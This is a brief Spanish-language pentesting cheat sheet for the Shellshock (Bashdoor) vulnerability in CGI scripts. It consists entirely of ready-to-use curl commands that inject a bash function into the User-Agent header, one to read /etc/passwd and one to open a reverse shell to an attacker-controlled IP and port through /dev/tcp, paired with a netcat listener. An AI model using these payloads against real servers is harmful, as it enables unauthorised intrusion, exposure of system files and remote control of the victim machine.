Verificación de vulnerabilidad Shellshock / Bashdoor.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<target>/cgi-bin/<vulnerable>
Reverse shell.
# Máquina atacante nc -lvnp <listen-port> # Máquina victima curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" http://<target>/cgi-bin/<vulnerable>
Última actualización hace 1 año